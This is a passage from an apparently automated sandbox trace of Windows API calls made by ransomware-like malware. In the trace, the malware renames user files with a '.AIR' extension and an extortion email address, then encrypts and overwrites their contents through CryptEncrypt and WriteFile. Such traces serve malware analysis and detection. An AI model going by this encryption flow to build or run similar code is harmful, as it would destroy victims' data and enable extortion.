Flags=0x0, Size=0xd8) returned 0x31fae0 [0167.139] lstrcpyW (in: lpString1=0x31fae0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IIwU2W.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IIwU2W.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IIwU2W.jpg" [0167.140] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IIwU2W.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IIwU2W.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IIwU2W.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0167.140] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IIwU2W.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iiwu2w.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IIwU2W.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iiwu2w.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.142] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\IIwU2W.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\iiwu2w.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.142] GetProcessHeap () returned 0x2e0000 [0167.142] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0167.142] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=66108) returned 1 [0167.142] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1023c [0167.142] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.142] GetProcessHeap () returned 0x2e0000 [0167.142] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.142] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.143] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.143] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.143] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.145] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x1023c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x1023c, lpOverlapped=0x0) returned 1 [0167.147] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-66108, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.147] WriteFile (in: hFile=0x52c, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0x1023c, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x1023c, lpOverlapped=0x0) returned 1 [0167.148] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.148] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.148] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hfz3 DSQzygyeD-.m4a", dwFileAttributes=0x80) returned 1 [0167.148] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hfz3 DSQzygyeD-.m4a") returned 66 [0167.148] GetProcessHeap () returned 0x2e0000 [0167.148] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xea) returned 0x30a498 [0167.148] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hfz3 DSQzygyeD-.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hfz3 DSQzygyeD-.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hfz3 DSQzygyeD-.m4a" [0167.148] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hfz3 DSQzygyeD-.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hfz3 DSQzygyeD-.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hfz3 DSQzygyeD-.m4a.12781717671972518758.ex_parvis@aol.com.AIR" [0167.149] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hfz3 DSQzygyeD-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hfz3 dsqzygyed-.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hfz3 DSQzygyeD-.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hfz3 dsqzygyed-.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.161] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hfz3 DSQzygyeD-.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hfz3 dsqzygyed-.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.162] GetProcessHeap () returned 0x2e0000 [0167.162] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0167.162] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=6340) returned 1 [0167.162] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x18c4 [0167.162] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.162] GetProcessHeap () returned 0x2e0000 [0167.162] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.162] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.162] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.163] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.163] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.163] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x18c4, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x18c4, lpOverlapped=0x0) returned 1 [0167.163] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-6340, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.163] WriteFile (in: hFile=0x52c, lpBuffer=0x3b3ce0*, nNumberOfBytesToWrite=0x18c4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b3ce0*, lpNumberOfBytesWritten=0x2acf9c8*=0x18c4, lpOverlapped=0x0) returned 1 [0167.165] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.165] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.165] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hEtM.pps", dwFileAttributes=0x80) returned 1 [0167.165] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hEtM.pps") returned 55 [0167.165] GetProcessHeap () returned 0x2e0000 [0167.165] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x336dd8 [0167.165] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hEtM.pps" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hEtM.pps") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hEtM.pps" [0167.165] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hEtM.pps", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hEtM.pps.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hEtM.pps.12781717671972518758.ex_parvis@aol.com.AIR" [0167.165] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hEtM.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hetm.pps"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hEtM.pps.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hetm.pps.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.168] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\hEtM.pps.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hetm.pps.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.168] GetProcessHeap () returned 0x2e0000 [0167.168] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.168] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=71840) returned 1 [0167.168] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x118a0 [0167.169] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.169] GetProcessHeap () returned 0x2e0000 [0167.169] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.169] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.169] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.170] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.170] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.171] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x118a0, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x118a0, lpOverlapped=0x0) returned 1 [0167.173] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-71840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.173] WriteFile (in: hFile=0x52c, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0x118a0, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x118a0, lpOverlapped=0x0) returned 1 [0167.173] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.174] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.174] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GxnYndw.swf", dwFileAttributes=0x80) returned 1 [0167.174] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GxnYndw.swf") returned 58 [0167.174] GetProcessHeap () returned 0x2e0000 [0167.174] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xda) returned 0x3a7428 [0167.174] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GxnYndw.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GxnYndw.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GxnYndw.swf" [0167.174] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GxnYndw.swf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GxnYndw.swf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GxnYndw.swf.12781717671972518758.ex_parvis@aol.com.AIR" [0167.174] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GxnYndw.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gxnyndw.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GxnYndw.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gxnyndw.swf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.177] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GxnYndw.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gxnyndw.swf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.177] GetProcessHeap () returned 0x2e0000 [0167.177] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0167.177] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=20512) returned 1 [0167.178] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x5020 [0167.178] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.178] GetProcessHeap () returned 0x2e0000 [0167.178] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.178] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.178] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.179] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.179] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.179] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x5020, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x5020, lpOverlapped=0x0) returned 1 [0167.179] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-20512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.179] WriteFile (in: hFile=0x52c, lpBuffer=0x3b7438*, nNumberOfBytesToWrite=0x5020, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b7438*, lpNumberOfBytesWritten=0x2acf9c8*=0x5020, lpOverlapped=0x0) returned 1 [0167.180] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.180] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.180] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FljnCN2hsWI2s98.ods", dwFileAttributes=0x80) returned 1 [0167.181] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FljnCN2hsWI2s98.ods") returned 66 [0167.181] GetProcessHeap () returned 0x2e0000 [0167.181] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xea) returned 0x31fae0 [0167.181] lstrcpyW (in: lpString1=0x31fae0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FljnCN2hsWI2s98.ods" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FljnCN2hsWI2s98.ods") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FljnCN2hsWI2s98.ods" [0167.181] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FljnCN2hsWI2s98.ods", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FljnCN2hsWI2s98.ods.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FljnCN2hsWI2s98.ods.12781717671972518758.ex_parvis@aol.com.AIR" [0167.181] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FljnCN2hsWI2s98.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fljncn2hswi2s98.ods"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FljnCN2hsWI2s98.ods.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fljncn2hswi2s98.ods.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.184] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FljnCN2hsWI2s98.ods.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fljncn2hswi2s98.ods.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.184] GetProcessHeap () returned 0x2e0000 [0167.184] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0167.184] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=28027) returned 1 [0167.184] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x6d7b [0167.184] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.184] GetProcessHeap () returned 0x2e0000 [0167.184] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.184] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.185] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.185] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.186] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.186] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x6d7b, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x6d7b, lpOverlapped=0x0) returned 1 [0167.189] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.189] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.189] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f d3mSfK65o.mp3", dwFileAttributes=0x80) returned 1 [0167.189] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f d3mSfK65o.mp3") returned 62 [0167.189] GetProcessHeap () returned 0x2e0000 [0167.189] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe2) returned 0x3ac428 [0167.189] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f d3mSfK65o.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f d3mSfK65o.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f d3mSfK65o.mp3" [0167.189] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f d3mSfK65o.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f d3mSfK65o.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f d3mSfK65o.mp3.12781717671972518758.ex_parvis@aol.com.AIR" [0167.189] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f d3mSfK65o.mp3" (normalized: 